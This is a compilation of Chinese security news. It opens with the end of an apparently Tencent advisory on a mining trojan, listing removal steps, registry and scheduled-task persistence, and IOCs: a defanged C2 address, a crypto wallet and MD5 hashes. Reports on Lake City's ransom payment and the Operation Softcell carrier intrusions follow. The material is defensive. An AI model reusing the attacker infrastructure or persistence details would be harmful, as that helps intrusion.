3、企业用户可在服务器部署腾讯御点终端及时对服务器打补丁，防止这类木马利用windows提权漏洞，从而防范此类攻击。 对于已经中毒的企业和个人用户，除了使用杀毒软件清理此病毒外，还可做以下操作手动删除： 删除文件 c:\windows\fonts\system32\taskhsot.exe c:\windows\fonts\system32\svchost.exe c:\windows\fonts\system32\jbeta.bat c:\windows\fonts\system32\cmd.bat C:\windows\fonts\system.bat C:\\Windows\\reg\\smss.exe 删除注册表： HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 删除计划任务 Windows Update IOCs url hxxp://220.125.217.130:1231/ 钱包 438uqHTH7gqPfSBJhxpELTFqgafi4y48FJroP7MQ5r9DdvJqyMXnqWGa9YqtDiHueo3HnpRygtfEsc4EqQdrS1Y1EJpKBS9.AAA MD5 aa6e101b549aa8f96b180142bef8700b d350bb49096e00c4e6de567614fdc590 d76e1525c8998795867a17ed33573552 89909ce04d28fa31ed9095116e4635c5 6afe1d47d90f1687a3053ebeaf06e8b8 8ccf1623d36136e51b2f282f0ee0ba1b 036f82700b985d8a50b2f60c98ab9d77 5b4fa0e875703efdba091706321951eb c5cb6e274c71243c084556b24eab9241 参考链接 https://mp.weixin.qq.com/s/3J84msMXXH8PPc-J0w8FPA

在美国佛州Riviera City成为首个同意向黑客支付赎金（高达60万美元）的城市之后，佛州又有一个城市宣布采取相同的应对方式。莱克城（Lake City）位于佛州北部，拥有6.5万人口，在本次黑客攻击中各项市政工作已经停摆两周时间。在本周一的市政紧急会议中，通过投票决定支付42个比特币，价值将近50万美元的赎金。 图片来自于 maxpixel 莱克城于今年6月10日遭到了灾难性的勒索软件攻击，该市将其称为“Triple Threat”。尽管该城市的IT人员在发现攻击后的十分钟内将受影响的系统断开连接，但是除了在独立网络中运行的警察和消防部分，该市政的几乎所有计算机系统都感染了勒索软件。 在感染后一周莱克城就收到了赎金请求，并且通过保险提供商League of Cities进行谈判，确认了42个比特币的赎金。援引当地媒体报道，该市政官员本周一同意支付赎金要求，并于6月25日向该保险公司支付了款项。根据比特币付款时的价格，估计付款价值在480,000美元到500,000美元之间。该市的IT人员现在正在努力在收到解密密钥后恢复其数据。   （稿源：cnBeta，封面源自网络。）

黑客已经悄然渗透到全球十多家移动运营商，完全掌控了公司的通讯网络。根据总部位于波士顿的安全公司Cybereason近期发布的安全警告，在过去七年中黑客一直利用已经渗透的运营商网络来窃取敏感数据，甚至于在必要的时候可以完全关闭通讯网络。 该公司的安全研究人员本周二表示，他们一直在调查名为Operation Softcell的黑客活动，攻击目标主要针对欧洲、亚洲、非洲和中东地区的移动运营商。自2012年开始不断有移动运营商被悄然渗透，获取完整的网络控制权限，并吸取了数百GB的用户数据。 Cybereason安全研究主管Amit Serper表示：“这些黑客拥有所有用户名和密码，并为自己创建了一系列特权，能够做任何他们想要做的事情。黑客拥有高级别的访问权限，如果愿意的话他们甚至可以关闭整个通讯网络。” Serper表示目前没有证据表明有美国运营商受到影响，但是这个黑客活动仍在持续活跃，甚至可能会衍生出更强大的病毒控制形态。Cybereason发现，虽然他们能够破坏网络信号，但黑客更关注间谍活动而不是中断。黑客窃取了数百GB的呼叫数据记录，其中包括敏感信息，如实时地理定位。 在获得对移动运营商内部服务器的访问权限之后，黑客可以访问数亿客户的呼叫数据记录。这将提供诸如地理位置数据，呼叫日志和文本消息记录之类的信息。虽然黑客可以访问数百万人的数据，但他们只窃取了不到100名高度针对性的受害者的数据。 Cybereason的安全实践副总裁Mor Levi表示，袭击者可能会成为政府和军方中高调受害者的目标。 Cybereason的研究人员发现，攻击者通过利用旧漏洞获取了对十几家移动运营商的访问权限，例如隐藏在Microsoft Word文件中的恶意软件或者找到属于该公司的公开服务器。 一旦他们进入，恶意软件就会通过搜索同一网络上的所有计算机进行传播，并尝试通过登录尝试来充斥他们。只要凭证有效，它就会继续传播，直到黑客到达呼叫者数据记录数据库。   （稿源：cnBeta，封面源自网络。）